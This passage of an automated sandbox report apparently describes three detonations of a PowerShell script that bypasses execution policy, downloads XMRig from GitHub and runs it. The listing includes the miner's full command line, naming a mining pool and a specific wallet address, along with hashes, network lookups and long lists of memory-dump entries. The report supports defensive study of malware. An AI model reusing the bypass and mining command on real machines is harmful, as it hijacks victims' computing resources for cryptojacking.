memory/1228-112-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-113-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-114-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-115-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-116-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-117-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

memory/1228-118-0x00007FF7BF220000-0x00007FF7BFE53000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:23

Platform

win10-20240404-en

Max time kernel

1800s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4768-0-0x00007FFC45323000-0x00007FFC45324000-memory.dmp

memory/4768-5-0x0000026545780000-0x00000265457A2000-memory.dmp

memory/4768-6-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

memory/4768-9-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

memory/4768-10-0x00000265459D0000-0x0000026545A46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pgp4pfbb.ryn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4768-25-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

memory/4768-48-0x0000026545990000-0x00000265459A2000-memory.dmp

memory/4768-61-0x00000265457C0000-0x00000265457CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2332-90-0x00000219031B0000-0x00000219031D0000-memory.dmp

memory/2332-91-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/4768-93-0x00007FFC45323000-0x00007FFC45324000-memory.dmp

memory/2332-92-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/4768-94-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

memory/4768-95-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

memory/2332-96-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-97-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-98-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-99-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-100-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-101-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-102-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-103-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-104-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-105-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-106-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-107-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-108-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-109-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-110-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-111-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-112-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-113-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-114-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-115-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-116-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-117-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-118-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-119-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-120-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-121-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-122-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-123-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-124-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-125-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-126-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-127-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-128-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-129-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-130-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-131-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-132-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-133-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-134-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-135-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-136-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-137-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-138-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-139-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-140-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-141-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-142-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-143-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-144-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-145-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-146-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-147-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-148-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-149-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-150-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-151-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-152-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-153-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-154-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-155-0x00007FF659750000-0x00007FF65A383000-memory.dmp

memory/2332-156-0x00007FF659750000-0x00007FF65A383000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:34

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

memory/2772-0-0x00007FFE8F503000-0x00007FFE8F504000-memory.dmp

memory/2772-5-0x000001D24A8B0000-0x000001D24A8D2000-memory.dmp

memory/2772-6-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp

memory/2772-9-0x000001D24AB90000-0x000001D24AC06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mjynz3hr.edm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2772-10-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp

memory/2772-25-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp

memory/2772-48-0x000001D24AD10000-0x000001D24AD22000-memory.dmp

memory/2772-61-0x000001D24AB70000-0x000001D24AB7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1012-90-0x000001B0FD420000-0x000001B0FD440000-memory.dmp

memory/1012-91-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/2772-93-0x00007FFE8F503000-0x00007FFE8F504000-memory.dmp

memory/1012-92-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/2772-94-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp

memory/1012-95-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-96-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-97-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-98-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-99-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-100-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-101-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-102-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-103-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-104-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-105-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-106-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-107-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-108-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-109-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-110-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-111-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-112-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-113-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-114-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-115-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-116-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-117-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-118-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-119-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-120-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-121-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-122-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-123-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-124-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-125-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-126-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-127-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-128-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-129-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-130-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-131-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-132-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-133-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-134-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-135-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-136-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-137-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-138-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-139-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-140-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-141-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-142-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-143-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-144-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-145-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-146-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-147-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-148-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-149-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-150-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-151-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-152-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-153-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-154-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

memory/1012-155-0x00007FF769DB0000-0x00007FF76A9E3000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:39

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1751s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

memory/2676-3-0x00007FFA5ED73000-0x00007FFA5ED74000-memory.dmp

memory/2676-5-0x000001AB53080000-0x000001AB530A2000-memory.dmp

memory/2676-8-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp

memory/2676-9-0x000001AB53240000-0x000001AB532B6000-memory.dmp

memory/2676-10-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s0rce1wr.5nm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2676-25-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp

memory/2676-48-0x000001AB536F0000-0x000001AB53702000-memory.dmp

memory/2676-61-0x000001AB53230000-0x000001AB5323A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2952-90-0x000002802E580000-0x000002802E5A0000-memory.dmp

memory/2952-91-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2676-92-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp

memory/2676-94-0x00007FFA5ED73000-0x00007FFA5ED74000-memory.dmp

memory/2952-93-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2676-95-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp

memory/2952-96-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-97-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-98-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-99-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-100-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

